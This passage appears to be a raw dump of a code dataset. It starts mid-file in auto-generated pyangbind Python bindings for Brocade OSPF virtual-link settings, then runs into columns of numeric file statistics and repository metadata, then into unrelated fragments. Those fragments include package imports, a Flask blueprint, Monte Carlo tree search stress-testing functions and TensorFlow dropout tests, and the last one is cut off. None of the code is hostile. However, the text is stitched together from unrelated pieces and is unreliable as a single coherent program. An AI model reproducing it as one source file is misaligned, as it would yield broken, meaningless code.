Getter method for hello_interval, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/hello_interval (common-def:time-interval-sec)
"""
return self.__hello_interval
def _set_hello_interval(self, v, load=False):
"""
Setter method for hello_interval, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/hello_interval (common-def:time-interval-sec)
If this variable is read-only (config: false) in the
source YANG file, then _set_hello_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_hello_interval() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(10), is_leaf=True, yang_name="hello-interval", rest_name="hello-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Time between HELLO packets'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """hello_interval must be of a type compatible with common-def:time-interval-sec""",
'defined-type': "common-def:time-interval-sec",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(10), is_leaf=True, yang_name="hello-interval", rest_name="hello-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Time between HELLO packets'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)""",
})
self.__hello_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_hello_interval(self):
self.__hello_interval = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(10), is_leaf=True, yang_name="hello-interval", rest_name="hello-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Time between HELLO packets'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)
def _get_retransmit_interval(self):
"""
Getter method for retransmit_interval, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/retransmit_interval (common-def:time-interval-sec)
"""
return self.__retransmit_interval
def _set_retransmit_interval(self, v, load=False):
"""
Setter method for retransmit_interval, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/retransmit_interval (common-def:time-interval-sec)
If this variable is read-only (config: false) in the
source YANG file, then _set_retransmit_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_retransmit_interval() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..3600']}), is_leaf=True, yang_name="retransmit-interval", rest_name="retransmit-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Time between retransmitting lost link state\n advertisements'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """retransmit_interval must be of a type compatible with common-def:time-interval-sec""",
'defined-type': "common-def:time-interval-sec",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..3600']}), is_leaf=True, yang_name="retransmit-interval", rest_name="retransmit-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Time between retransmitting lost link state\n advertisements'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)""",
})
self.__retransmit_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_retransmit_interval(self):
self.__retransmit_interval = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..3600']}), is_leaf=True, yang_name="retransmit-interval", rest_name="retransmit-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Time between retransmitting lost link state\n advertisements'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)
def _get_transmit_delay(self):
"""
Getter method for transmit_delay, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/transmit_delay (common-def:time-interval-sec)
"""
return self.__transmit_delay
def _set_transmit_delay(self, v, load=False):
"""
Setter method for transmit_delay, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/transmit_delay (common-def:time-interval-sec)
If this variable is read-only (config: false) in the
source YANG file, then _set_transmit_delay is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_transmit_delay() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..3600']}), is_leaf=True, yang_name="transmit-delay", rest_name="transmit-delay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Link state transmit delay'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """transmit_delay must be of a type compatible with common-def:time-interval-sec""",
'defined-type': "common-def:time-interval-sec",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..3600']}), is_leaf=True, yang_name="transmit-delay", rest_name="transmit-delay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Link state transmit delay'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)""",
})
self.__transmit_delay = t
if hasattr(self, '_set'):
self._set()
def _unset_transmit_delay(self):
self.__transmit_delay = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..3600']}), is_leaf=True, yang_name="transmit-delay", rest_name="transmit-delay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Link state transmit delay'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)
def _get_md5_authentication(self):
"""
Getter method for md5_authentication, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/md5_authentication (container)
"""
return self.__md5_authentication
def _set_md5_authentication(self, v, load=False):
"""
Setter method for md5_authentication, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/md5_authentication (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_md5_authentication is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_md5_authentication() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=md5_authentication.md5_authentication, is_container='container', presence=False, yang_name="md5-authentication", rest_name="md5-authentication", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'MD5 authentication parameters', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """md5_authentication must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=md5_authentication.md5_authentication, is_container='container', presence=False, yang_name="md5-authentication", rest_name="md5-authentication", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'MD5 authentication parameters', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='container', is_config=True)""",
})
self.__md5_authentication = t
if hasattr(self, '_set'):
self._set()
def _unset_md5_authentication(self):
self.__md5_authentication = YANGDynClass(base=md5_authentication.md5_authentication, is_container='container', presence=False, yang_name="md5-authentication", rest_name="md5-authentication", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'MD5 authentication parameters', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='container', is_config=True)
virt_link_neighbor = __builtin__.property(_get_virt_link_neighbor, _set_virt_link_neighbor)
authentication_key = __builtin__.property(_get_authentication_key, _set_authentication_key)
dead_interval = __builtin__.property(_get_dead_interval, _set_dead_interval)
hello_interval = __builtin__.property(_get_hello_interval, _set_hello_interval)
retransmit_interval = __builtin__.property(_get_retransmit_interval, _set_retransmit_interval)
transmit_delay = __builtin__.property(_get_transmit_delay, _set_transmit_delay)
md5_authentication = __builtin__.property(_get_md5_authentication, _set_md5_authentication)
_pyangbind_elements = {'virt_link_neighbor': virt_link_neighbor, 'authentication_key': authentication_key, 'dead_interval': dead_interval, 'hello_interval': hello_interval, 'retransmit_interval': retransmit_interval, 'transmit_delay': transmit_delay, 'md5_authentication': md5_authentication, }
| 87.285294
| 752
| 0.743539
| 4,094
| 29,677
| 5.157792
| 0.055203
| 0.03315
| 0.03978
| 0.031824
| 0.857643
| 0.832402
| 0.824872
| 0.816348
| 0.810949
| 0.804887
| 0
| 0.024048
| 0.11022
| 29,677
| 339
| 753
| 87.542773
| 0.775619
| 0.134953
| 0
| 0.457944
| 0
| 0.046729
| 0.401792
| 0.188006
| 0
| 0
| 0
| 0
| 0
| 1
| 0.11215
| false
| 0.018692
| 0.046729
| 0
| 0.275701
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4dc567d79739ebdd5a03cb12cd552429f4022e31
| 120
|
py
|
Python
|
chiki_deploy/__init__.py
|
endsh/chiki-deploy
|
d02ab458b2319629ce11bd1bc604681f61887a9a
|
[
"MIT"
] | null | null | null |
chiki_deploy/__init__.py
|
endsh/chiki-deploy
|
d02ab458b2319629ce11bd1bc604681f61887a9a
|
[
"MIT"
] | null | null | null |
chiki_deploy/__init__.py
|
endsh/chiki-deploy
|
d02ab458b2319629ce11bd1bc604681f61887a9a
|
[
"MIT"
] | null | null | null |
# coding: utf-8
from .front import *
from .nginx import *
from .server import *
from .utils import *
from .web import *
| 17.142857
| 21
| 0.7
| 18
| 120
| 4.666667
| 0.555556
| 0.47619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010309
| 0.191667
| 120
| 6
| 22
| 20
| 0.85567
| 0.108333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1501110dcc378051e8482666938c183d918a535a
| 30
|
py
|
Python
|
pydeepl/__init__.py
|
spandanagella/pydeepl
|
48186685e4bcb4b029ac683bcad575fe0e9654d5
|
[
"MIT"
] | null | null | null |
pydeepl/__init__.py
|
spandanagella/pydeepl
|
48186685e4bcb4b029ac683bcad575fe0e9654d5
|
[
"MIT"
] | null | null | null |
pydeepl/__init__.py
|
spandanagella/pydeepl
|
48186685e4bcb4b029ac683bcad575fe0e9654d5
|
[
"MIT"
] | 1
|
2020-06-04T21:05:57.000Z
|
2020-06-04T21:05:57.000Z
|
from .pydeepl import translate
| 30
| 30
| 0.866667
| 4
| 30
| 6.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 30
| 1
| 30
| 30
| 0.962963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
12913fc271ba713c2d294299a48edacbdbf5a74e
| 147
|
py
|
Python
|
tools/main/process/Validators/__init__.py
|
hidura/sugelico
|
d3c76f358a788d5f3a891cf0a7dd7420ac3a7845
|
[
"MIT"
] | null | null | null |
tools/main/process/Validators/__init__.py
|
hidura/sugelico
|
d3c76f358a788d5f3a891cf0a7dd7420ac3a7845
|
[
"MIT"
] | null | null | null |
tools/main/process/Validators/__init__.py
|
hidura/sugelico
|
d3c76f358a788d5f3a891cf0a7dd7420ac3a7845
|
[
"MIT"
] | null | null | null |
from tools.main.process.Validators.Login import ValidLogin
from tools.main.process.Validators.Commerce import ValidCommerce
__author__ = 'hidura'
| 29.4
| 64
| 0.843537
| 18
| 147
| 6.666667
| 0.666667
| 0.15
| 0.216667
| 0.333333
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 147
| 4
| 65
| 36.75
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0.040816
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
12ab1902dc9ec092bf67a58d8cbae8bc33396fcc
| 25
|
py
|
Python
|
recognition/ocr/psenet/model/__init__.py
|
kalenforn/MMVA
|
1e4ec5417d4497a14f226fab8a66fe065a9f0f65
|
[
"MIT"
] | 4
|
2021-12-16T08:17:49.000Z
|
2022-03-12T10:14:50.000Z
|
recognition/ocr/psenet/model/__init__.py
|
kalenforn/video-content-clean
|
4b6e572ec034fbe2e668c250cff8e1c9a13dd0e0
|
[
"MIT"
] | null | null | null |
recognition/ocr/psenet/model/__init__.py
|
kalenforn/video-content-clean
|
4b6e572ec034fbe2e668c250cff8e1c9a13dd0e0
|
[
"MIT"
] | 1
|
2021-12-14T08:17:41.000Z
|
2021-12-14T08:17:41.000Z
|
from .model import PSENet
| 25
| 25
| 0.84
| 4
| 25
| 5.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 25
| 1
| 25
| 25
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
12d2ab083352bdf48400fc6be0971f22d482d892
| 193
|
py
|
Python
|
rest_api/__init__.py
|
rajasgs/flask-rest-math-simple
|
3a4206be66f3e53e669daaca924eb32b34b28822
|
[
"MIT"
] | null | null | null |
rest_api/__init__.py
|
rajasgs/flask-rest-math-simple
|
3a4206be66f3e53e669daaca924eb32b34b28822
|
[
"MIT"
] | 2
|
2021-04-27T13:53:45.000Z
|
2021-06-02T02:34:43.000Z
|
rest_api/__init__.py
|
rajasgs/flask-rest-math-simple
|
3a4206be66f3e53e669daaca924eb32b34b28822
|
[
"MIT"
] | null | null | null |
from flask import Blueprint
api = Blueprint('dummy_name', __name__)
from .index import *
from .template_controller import *
from .math_controller import *
from .placeholder_controller import *
| 27.571429
| 39
| 0.803109
| 24
| 193
| 6.125
| 0.5
| 0.204082
| 0.272109
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.124352
| 193
| 7
| 40
| 27.571429
| 0.869822
| 0
| 0
| 0
| 0
| 0
| 0.051546
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.833333
| 0
| 0.833333
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
12dad653ca60c14aa5130fed995b916d974fda0a
| 3,324
|
py
|
Python
|
src/ast_toolbox/mcts/AST_MCTS.py
|
hdelecki/AdaptiveStressTestingToolbox
|
184d7d7f1b4acb65eecb749e3c3a78cbcfc3c4ed
|
[
"MIT"
] | 29
|
2019-01-09T23:56:35.000Z
|
2022-03-18T03:41:10.000Z
|
src/ast_toolbox/mcts/AST_MCTS.py
|
hdelecki/AdaptiveStressTestingToolbox
|
184d7d7f1b4acb65eecb749e3c3a78cbcfc3c4ed
|
[
"MIT"
] | 39
|
2019-01-10T00:32:26.000Z
|
2022-03-12T00:29:05.000Z
|
src/ast_toolbox/mcts/AST_MCTS.py
|
hdelecki/AdaptiveStressTestingToolbox
|
184d7d7f1b4acb65eecb749e3c3a78cbcfc3c4ed
|
[
"MIT"
] | 11
|
2019-01-10T08:11:47.000Z
|
2021-12-28T15:56:02.000Z
|
import ast_toolbox.mcts.MCTSdpw as MCTSdpw
import ast_toolbox.mcts.MDP as MDP
def rollout_getAction(ast):
"""Get the rollout function from ast.
Parameters
----------
ast : :py:class:`ast_toolbox.mcts.AdaptiveStressTest.AdaptiveStressTesting`
The AST object.
"""
def rollout_policy(s, tree):
return ast.random_action()
return rollout_policy
def explore_getAction(ast):
"""Get the exploration function from ast.
Parameters
----------
ast : :py:class:`ast_toolbox.mcts.AdaptiveStressTest.AdaptiveStressTesting`
The AST object.
"""
def explore_policy(s, tree):
return ast.explore_action(s, tree)
return explore_policy
def stress_test(ast, mcts_params, top_paths, verbose=True, return_tree=False):
"""Run stress test with mode 1 (search with single tree).
Parameters
----------
ast : :py:class:`ast_toolbox.mcts.AdaptiveStressTest.AdaptiveStressTesting`
The AST object.
mcts_params: :py:class:`ast_toolbox.mcts.MCTSdpw.DPWParams`
The mcts parameters.
top_paths : :py:class:`ast_toolbox.mcts.BoundedPriorityQueues`
The bounded priority queue to store top-rewarded trajectories.
verbose : bool, optional
Whether to logging test information
return_tree: bool, optional
Whether to return the search tree
Returns
-------
results : :py:class:`ast_toolbox.mcts.AdaptiveStressTest.AdaptiveStressTesting`
The bounded priority queue storing top-rewarded trajectories.
tree : dict
The resulting searching tree.
"""
dpw_model = MCTSdpw.DPWModel(ast.transition_model, rollout_getAction(ast), explore_getAction(ast))
tree = MCTSdpw.DPWTree(mcts_params, dpw_model)
(mcts_reward, action_seq) = MDP.simulate(tree.f.model, tree, MCTSdpw.selectAction, verbose=verbose)
results = ast.top_paths
if return_tree:
return results, tree.s_tree
else:
return results
def stress_test2(ast, mcts_params, top_paths, verbose=True, return_tree=False):
"""Run stress test with mode 2 (search with multiple trees).
Parameters
----------
ast : :py:class:`ast_toolbox.mcts.AdaptiveStressTest.AdaptiveStressTesting`
The AST object.
mcts_params: :py:class:`ast_toolbox.mcts.MCTSdpw.DPWParams`
The mcts parameters.
top_paths : :py:class:`ast_toolbox.mcts.BoundedPriorityQueues`
The bounded priority queue to store top-rewarded trajectories.
verbose : bool, optional
Whether to logging test information
return_tree: bool, optional
Whether to return the search tree
Returns
-------
results : :py:class:`ast_toolbox.mcts.AdaptiveStressTest.AdaptiveStressTesting`
The bounded priority queue storing top-rewarded trajectories.
tree : dict
The resulting searching tree.
"""
mcts_params.clear_nodes = False
mcts_params.n *= ast.params.max_steps
dpw_model = MCTSdpw.DPWModel(ast.transition_model, rollout_getAction(ast), explore_getAction(ast))
tree = MCTSdpw.DPWTree(mcts_params, dpw_model)
s = tree.f.model.getInitialState()
MCTSdpw.selectAction(tree, s, verbose=verbose)
results = ast.top_paths
if return_tree:
return results, tree.s_tree
else:
return results
| 32.588235
| 103
| 0.697353
| 401
| 3,324
| 5.63591
| 0.209476
| 0.053097
| 0.074336
| 0.075221
| 0.797345
| 0.779646
| 0.779646
| 0.779646
| 0.779646
| 0.779646
| 0
| 0.001137
| 0.206378
| 3,324
| 101
| 104
| 32.910891
| 0.855572
| 0.533093
| 0
| 0.451613
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.193548
| false
| 0
| 0.064516
| 0.064516
| 0.516129
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
421cb04b319cf61007343439df6c69238a9ccc22
| 72
|
py
|
Python
|
chatbot/tests.py
|
kunci115/cerdas
|
5c956960904ef96677a30405a3b2af53d714689e
|
[
"MIT"
] | 40
|
2019-03-31T03:32:17.000Z
|
2022-02-23T13:43:45.000Z
|
chatbot/tests.py
|
kunci115/cerdas
|
5c956960904ef96677a30405a3b2af53d714689e
|
[
"MIT"
] | 3
|
2019-03-19T10:40:08.000Z
|
2019-03-30T18:27:35.000Z
|
chatbot/tests.py
|
kunci115/cerdas
|
5c956960904ef96677a30405a3b2af53d714689e
|
[
"MIT"
] | 9
|
2019-03-18T02:37:13.000Z
|
2020-12-16T13:59:34.000Z
|
from __future__ import print_function
from django.test import TestCase
| 18
| 37
| 0.861111
| 10
| 72
| 5.7
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 72
| 3
| 38
| 24
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
42409f948832c254702a14993659abe90cd21938
| 4,288
|
py
|
Python
|
tests/test_rnn_dropout.py
|
sagnik/baseline
|
8d75616e04c1cca509dbebbb6d08ad7e1a7b9f88
|
[
"Apache-2.0"
] | 20
|
2019-11-13T01:09:53.000Z
|
2022-03-25T16:26:35.000Z
|
tests/test_rnn_dropout.py
|
sagnik/baseline
|
8d75616e04c1cca509dbebbb6d08ad7e1a7b9f88
|
[
"Apache-2.0"
] | 131
|
2019-10-12T10:53:17.000Z
|
2021-12-03T19:52:47.000Z
|
tests/test_rnn_dropout.py
|
sagnik/baseline
|
8d75616e04c1cca509dbebbb6d08ad7e1a7b9f88
|
[
"Apache-2.0"
] | 7
|
2020-02-04T15:35:59.000Z
|
2022-03-12T13:22:20.000Z
|
import os
import pytest
pytest.skip("This has been broken for a while, will fix soon, BL", allow_module_level=True)
import numpy as np
tf = pytest.importorskip("tensorflow")
from baseline.tf.tfy import rnn_cell_w_dropout, lstm_cell_w_dropout
@pytest.fixture(scope="module")
def set_cpu():
os.environ["CUDA_VISIBLE_DEVICES"] = ""
yield
del os.environ["CUDA_VISIBLE_DEVICES"]
def test_static_dropout_lstm_cell():
with tf.device("/cpu:0"):
sess = tf.compat.v1.Session()
x = np.random.randn(1, 10, 50).astype(np.float32)
with sess.graph.as_default():
with tf.variable_scope("DropoutIsOn"):
rnn_drop_cell = lstm_cell_w_dropout(100, 0.9999999999, training=True)
rnn_drop, _ = tf.nn.dynamic_rnn(
rnn_drop_cell, x, sequence_length=np.array([10], dtype=np.int), dtype=tf.float32
)
with tf.variable_scope("DropoutIsOff"):
rnn_no_drop_cell = lstm_cell_w_dropout(100, 0.9999999999, training=False)
rnn_no_drop, _ = tf.nn.dynamic_rnn(
rnn_no_drop_cell, x, sequence_length=np.array([10], dtype=np.int), dtype=tf.float32
)
sess.run(tf.compat.v1.global_variables_initializer())
out_ten = sess.run(rnn_drop)
assert len(out_ten[np.nonzero(out_ten)].squeeze()) < 20
out_ten = sess.run(rnn_no_drop)
assert len(out_ten[np.nonzero(out_ten)].squeeze()) > 20
def test_static_dropout_rnn_cell():
with tf.device("/cpu:0"):
sess = tf.compat.v1.Session()
x = np.random.randn(1, 10, 50).astype(np.float32)
with sess.graph.as_default():
with tf.variable_scope("DropoutIsOn"):
rnn_drop_cell = rnn_cell_w_dropout(100, 0.9999999999, "gru", training=True)
rnn_drop, _ = tf.nn.dynamic_rnn(
rnn_drop_cell, x, sequence_length=np.array([10], dtype=np.int), dtype=tf.float32
)
with tf.variable_scope("DropoutIsOff"):
rnn_no_drop_cell = rnn_cell_w_dropout(100, 0.9999999999, "gru", training=False)
rnn_no_drop, _ = tf.nn.dynamic_rnn(
rnn_no_drop_cell, x, sequence_length=np.array([10], dtype=np.int), dtype=tf.float32
)
sess.run(tf.compat.v1.global_variables_initializer())
out_ten = sess.run(rnn_drop)
assert len(out_ten[np.nonzero(out_ten)].squeeze()) < 20
out_ten = sess.run(rnn_no_drop)
assert len(out_ten[np.nonzero(out_ten)].squeeze()) > 20
def test_placeholder_dropout_lstm_cell():
with tf.device("/cpu:0"):
sess = tf.compat.v1.Session()
x = np.random.randn(1, 10, 50).astype(np.float32)
with sess.graph.as_default():
train_flag = tf.compat.v1.placeholder_with_default(False, shape=(), name="TEST_TRAIN_FLAG")
with tf.variable_scope("DropoutMightBeOn"):
rnn_cell = lstm_cell_w_dropout(100, 0.9999999999, training=train_flag)
rnn, _ = tf.nn.dynamic_rnn(rnn_cell, x, sequence_length=np.array([10], dtype=np.int), dtype=tf.float32)
sess.run(tf.compat.v1.global_variables_initializer())
out_ten = sess.run(rnn, {train_flag: True})
assert len(out_ten[np.nonzero(out_ten)].squeeze()) < 20
out_ten = sess.run(rnn)
assert len(out_ten[np.nonzero(out_ten)].squeeze()) > 20
def test_placeholder_dropout_rnn_cell():
with tf.device("/cpu:0"):
sess = tf.compat.v1.Session()
x = np.random.randn(1, 10, 50).astype(np.float32)
with sess.graph.as_default():
train_flag = tf.compat.v1.placeholder_with_default(False, shape=(), name="TEST_TRAIN_FLAG")
with tf.variable_scope("DropoutMightBeOn"):
rnn_cell = rnn_cell_w_dropout(100, 0.9999999999, "gru", training=train_flag)
rnn, _ = tf.nn.dynamic_rnn(rnn_cell, x, sequence_length=np.array([10], dtype=np.int), dtype=tf.float32)
sess.run(tf.compat.v1.global_variables_initializer())
out_ten = sess.run(rnn, {train_flag: True})
assert len(out_ten[np.nonzero(out_ten)].squeeze()) < 20
out_ten = sess.run(rnn)
assert len(out_ten[np.nonzero(out_ten)].squeeze()) > 20
| 45.617021
| 119
| 0.634795
| 610
| 4,288
| 4.204918
| 0.159016
| 0.05614
| 0.038986
| 0.040546
| 0.903314
| 0.882261
| 0.882261
| 0.882261
| 0.882261
| 0.870565
| 0
| 0.050456
| 0.232743
| 4,288
| 93
| 120
| 46.107527
| 0.729179
| 0
| 0
| 0.683544
| 0
| 0
| 0.057836
| 0
| 0
| 0
| 0
| 0
| 0.101266
| 1
| 0.063291
| false
| 0
| 0.063291
| 0
| 0.126582
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
42566ff76db628c9a53d6a492a66762803d0990f
| 133
|
py
|
Python
|
naucse/cli.py
|
befeleme/naucse.python.cz
|
dee2c8cce8db90108b01b40c0981053943352d11
|
[
"MIT"
] | 4
|
2019-02-14T08:02:41.000Z
|
2020-10-20T10:35:55.000Z
|
